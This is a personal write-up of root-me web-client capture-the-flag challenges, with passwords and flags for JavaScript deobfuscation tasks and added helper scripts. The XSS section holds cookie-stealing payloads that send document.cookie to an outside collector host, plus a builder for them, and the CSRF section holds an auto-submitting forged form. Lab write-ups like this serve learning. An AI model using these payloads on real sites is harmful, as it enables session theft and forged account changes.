NEKO

root-me web-client

2018/04/04

I forgot to save and lost the half-written writeup. A bit sad; I even feel like going to pet a cat.

HTML - disabled buttons

The button is only disabled on the client side, so POST the form manually with the body:

auth-login=admin&authbutton=Member access

Javascript - Authentication

Source: login.js

Javascript - Source

Source

Javascript - Authentication 2

Source: login.js

Javascript - Obfuscation 1

Source; URL-decode it.

Javascript - Obfuscation 2

unescape%28%22String.fromCharCode%2528104%252C68%252C117%252C102%252C106%252C100%252C107%252C105%252C49%252C53%252C54%2529%22%29")
Paste it into http://tool.chinaz.com/tools/urlencode.aspx
and URL-decode it twice (the %25 sequences are a second layer of encoding) to get

unescape("String.fromCharCode(104,68,117,102,106,100,107,105,49,53,54)")")

unescape() of that string is just the String.fromCharCode call itself, so run
String.fromCharCode(104,68,117,102,106,100,107,105,49,53,54)
in the console to get hDufjdki156

Javascript - Native code

With Firefox's JavaScript Deobfuscator add-on I'm no longer afraid of obfuscated JS (provided the code can be executed in the console; don't use Firebug).
Source captured by JavaScript Deobfuscator:

a = prompt('Entrez le mot de passe');
if (a == 'toto123lol') {
alert('bravo');
} else {
alert('fail...');
}

Alternatively, strip the trailing () so the function expression is no longer invoked; the console then prints its source instead of running it.
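As an added example (not from the original post and not the add-on's own code), here is the mechanism the JavaScript Deobfuscator relies on, in plain JavaScript that runs under Node: hook eval() and the Function constructor, run the payload, and collect every piece of source that reached a sink. The sample payload is constructed for this example (two layers; the inner one reaches the constructor through []["filter"]["constructor"], the way "native code" obfuscation does), and every function name in it is this example's own.

```javascript
// Added example, not from the original post and not the add-on's own code.
// Obfuscated JS eventually hands clear-text source to a dynamic-code sink,
// so hooking eval() and the Function constructor shows the final layer
// without reversing the wrappers by hand. Runs under Node.

const originalEval = globalThis.eval;
const OriginalFunction = Function;

// Execute `payload` (a string of JS) with both sinks hooked. Returns
// { result, captured }: the payload's value and every source string that
// reached eval() or Function() while it ran, outermost layer first.
// The hooks are removed again in the finally block.
function captureDynamicCode(payload) {
  const captured = [];

  function hookedEval(src) {
    captured.push(String(src));
    return originalEval(src); // indirect call: evaluates in global scope
  }
  function hookedFunction(...args) {
    // Function(p1, ..., pn, body): the body is the last argument.
    captured.push(String(args[args.length - 1]));
    return OriginalFunction(...args);
  }

  globalThis.eval = hookedEval;
  globalThis.Function = hookedFunction;
  // JSFuck-style code never spells out "Function"; it reaches the constructor
  // as []["filter"]["constructor"], which resolves through
  // Function.prototype.constructor, so that property is hooked as well.
  OriginalFunction.prototype.constructor = hookedFunction;
  try {
    const result = originalEval(payload);
    return { result, captured };
  } finally {
    globalThis.eval = originalEval;
    globalThis.Function = OriginalFunction;
    OriginalFunction.prototype.constructor = OriginalFunction;
  }
}

// Constructed sample (not the challenge's real code): the outer layer hides
// the inner one as char codes; the inner one builds and calls a function the
// way "native code" obfuscation does.
const innerLayer = "[]['filter']['constructor'](\"return 'toto123lol'\")()";
const samplePayload =
  'eval(String.fromCharCode(' +
  Array.from(innerLayer, (c) => c.charCodeAt(0)).join(',') +
  '))';

function demo() {
  return captureDynamicCode(samplePayload);
}

const shown = demo();
console.log('payload returned:', shown.result); // toto123lol
console.log('source seen by the sinks:', shown.captured);
```

The hooks are installed only for the duration of the call and restored in `finally`, so a payload that throws does not leave a modified `eval` behind. In a browser the same idea is applied from the console before the page's script runs, which is why the add-on needs to be active before the page loads.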

Javascript - Obfuscation 3

Source. The key line is:

String["fromCharCode"](dechiffre("\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30"));

Process it with a Python script:

from __future__ import print_function

# The \x-escaped literal, byte by byte: decoded, it is the comma-separated
# list of char codes that dechiffre() hands to String.fromCharCode
s1 = [0x35, 0x35, 0x2c, 0x35, 0x36, 0x2c, 0x35, 0x34, 0x2c, 0x37, 0x39, 0x2c, 0x31, 0x31, 0x35, 0x2c, 0x36, 0x39, 0x2c, 0x31, 0x31, 0x34, 0x2c, 0x31, 0x31, 0x36, 0x2c, 0x31, 0x30, 0x37, 0x2c, 0x34, 0x39, 0x2c, 0x35, 0x30]
print(''.join(chr(c) for c in s1))   # 55,56,54,79,115,69,114,116,107,49,50

# Second step: the char codes from the line above, turned into the password
s2 = [55, 56, 54, 79, 115, 69, 114, 116, 107, 49, 50]
print(''.join(chr(c) for c in s2))   # 786OsErtk12

Result:

55,56,54,79,115,69,114,116,107,49,50
786OsErtk12
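The same two decodings done statically, as an added example that is not part of the original post: nothing is eval'd, so the page's code never runs. It peels as many URL-encoding layers as there are, resolves \xNN escapes and applies String.fromCharCode to a comma-separated code list, so it covers both Obfuscation 2 and Obfuscation 3 above. The inputs are the two strings quoted in those sections (the Obfuscation 2 one without the stray trailing quote and parenthesis of the copied source); the function names and regexes are this example's own.

```javascript
// Added example, not from the original post: static decoding of the
// Obfuscation 2 and Obfuscation 3 layers without eval or a browser console.

// Peel URL-encoding layers until the text stops changing. Obfuscation 2 is
// encoded twice ("%2528" -> "%28" -> "("), so a single pass is not enough.
function urlDecodeAll(s, maxLayers = 8) {
  for (let i = 0; i < maxLayers; i++) {
    const next = decodeURIComponent(s);
    if (next === s) return s;
    s = next;
  }
  throw new Error('more than ' + maxLayers + ' URL-encoding layers');
}

// Turn "\x35\x35\x2c..." escapes in a piece of JS source into the characters
// they stand for (what the JS parser does when it loads the file).
function decodeHexEscapes(src) {
  return src.replace(/\\x([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// "104,68,117" -> "hDu": the String.fromCharCode step, done by hand, with a
// check that every entry really is a UTF-16 code unit.
function decodeCharCodeList(list) {
  return list
    .split(',')
    .map((n) => Number(n.trim()))
    .map((n) => {
      if (!Number.isInteger(n) || n < 0 || n > 0xffff) {
        throw new Error('not a UTF-16 code unit: ' + n);
      }
      return String.fromCharCode(n);
    })
    .join('');
}

// Obfuscation 2: URL-decode as often as needed, then pull the number list
// out of the String.fromCharCode(...) call that appears.
function solveObfuscation2(encoded) {
  const clear = urlDecodeAll(encoded);
  const m = /String\.fromCharCode\(([\d,\s]+)\)/.exec(clear);
  if (!m) throw new Error('no String.fromCharCode call after decoding: ' + clear);
  return decodeCharCodeList(m[1]);
}

// Obfuscation 3: the \x-escaped literal is itself a comma-separated list of
// char codes, which dechiffre() feeds to String.fromCharCode.
function solveObfuscation3(sourceLine) {
  const m = /"((?:\\x[0-9a-fA-F]{2})+)"/.exec(sourceLine);
  if (!m) throw new Error('no \\x-escaped string literal in: ' + sourceLine);
  return decodeCharCodeList(decodeHexEscapes(m[1]));
}

// The two challenge strings as they appear in the sections above.
const OBF2 =
  'unescape%28%22String.fromCharCode%2528104%252C68%252C117%252C102%252C106' +
  '%252C100%252C107%252C105%252C49%252C53%252C54%2529%22%29';
const OBF3 = String.raw`String["fromCharCode"](dechiffre("\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30"));`;

console.log(solveObfuscation2(OBF2)); // hDufjdki156
console.log(solveObfuscation3(OBF3)); // 786OsErtk12
```

decodeURIComponent is used in place of the page's unescape(): for these inputs the two agree, and decodeURIComponent throws on a malformed %-sequence instead of passing it through silently, which is what you want when feeding untrusted text through several decoding rounds.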

XSS - Stored 1

Steal the cookie via XSS.
XSS platform: http://xsspt.com/
Create a project with the default module. Once it is configured, open the project, click "view code" at the top right, and note the URL it contains.

<script>var img=document.createElement("img");img.src = "http://xsspt.com/Ho2v3T?1522993191?" + escape(document.cookie);document.body.appendChild(img);</script>

Or, with the whole loader base64-encoded (the argument to atob() must be the base64 of the entire script, not just of the URL; inside an inline onerror handler the document is on the scope chain, which is why createElement and body work without the document. prefix):

<img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL0twSFB4bz8nK2VzY2FwZShkb2N1bWVudC5jb29raWUp'))>

which decodes to s=createElement('script');body.appendChild(s);s.src='http://xsspt.com/KpHPxo?'+escape(document.cookie)

(The src URLs in these are my own collector addresses; replace them with yours.)
Once the message is sent, the XSS platform receives the cookie.
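Building the <img onerror=eval(atob(...))> payload from a collector URL, and decoding an existing one to see what it runs, as an added example that is not from the original post and not the XSS platform's code. As a check it decodes the probe payload used in the CSRF - 0 protection section below, which must round-trip back to the same blob. The collector URLs are the author's own from this page; the function names are this example's.

```javascript
// Added example, not from the original post: build and inspect the
// <img onerror=eval(atob(...))> payloads used on this page. Base64-wrapping
// the loader keeps quotes, slashes and the word "script" out of the stored
// text, and decoding a payload is the quickest way to see what a blob does.
// Runs under Node (Buffer is used for base64).

// The loader the page base64-encodes. Inside an inline event handler the
// document is on the scope chain, so createElement and body resolve without
// the `document.` prefix.
function loaderScript(collectorUrl, exfilExpression) {
  return "s=createElement('script');body.appendChild(s);s.src='" +
    collectorUrl + "'+" + exfilExpression;
}

// Wrap a script in the img/onerror/atob form seen above.
function imgOnerrorPayload(script) {
  const b64 = Buffer.from(script, 'utf8').toString('base64');
  return "<img src=x onerror=eval(atob('" + b64 + "'))>";
}

// Reverse step: pull the base64 out of a payload and return the script it runs.
function decodeImgOnerrorPayload(html) {
  const m = /atob\('([A-Za-z0-9+\/=]+)'\)/.exec(html);
  if (!m) throw new Error('no atob(...) blob in payload');
  return Buffer.from(m[1], 'base64').toString('utf8');
}

// The probe payload from the CSRF - 0 protection section, as printed there.
const PROBE_FROM_PAGE =
  "<img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL0hvMnYzVD8nK01hdGgucmFuZG9tKCk='))>";

// What the probe does: load a script from the collector with a random query
// string, i.e. a plain "did my injection execute?" beacon.
console.log(decodeImgOnerrorPayload(PROBE_FROM_PAGE));

// The cookie-stealing variant, built instead of hand-encoded.
console.log(imgOnerrorPayload(
  loaderScript('http://xsspt.com/KpHPxo?', 'escape(document.cookie)')));
```

Note that eval(atob(...)) only hides the loader from whoever reads the stored text; the request to the collector still shows up in the victim's network traffic, so in a real engagement the collector URL is the part to protect, not the wrapper.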

CSRF - 0 protection

Create an account: neko
There are four menu items:
1. Contact: lets you send a message to the admin. There's XSS here, which you can confirm with

<img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL0hvMnYzVD8nK01hdGgucmFuZG9tKCk='))>

I tried to alert the cookie but it didn't work (I'm not very familiar with XSS; I probably did something wrong).

2. Profile: a form in which the status checkbox can't be ticked. The idea must be to use CSRF to get status set to validated.
3. Private: shows "not validated"; this must be where the flag is displayed.

Method:

In Contact, enter any email address and put this in the comment field:

<form id="csrf" method="post" enctype="multipart/form-data" action="http://challenge01.root-me.org/web-client/ch22/?action=profile">
<input type="text" name="username" value="neko">
<input type="checkbox" name="status" checked>
<button type="submit">Submit</button>
</form>
<script>document.getElementById("csrf").submit()</script>

When the admin reads the message, their browser submits the form with the admin session and, since there is no token to stop it, the profile update goes through.
Wait about half a minute, and the flag appears under Private:
Csrf_Fr33style-L3v3l1!

Flash - Authentication

Fuck! I'll come back and fill this in once I've done the ones I can.

CSRF - token bypass

Fuck! Don't know this one either.

XSS - Reflected

Fuck!…

Javascript - Obfuscation 4

Original author: n3k0

Published: April 4th 2018, 5:08:26

Shout: with no 魔夜2 to play, I'm going to die.
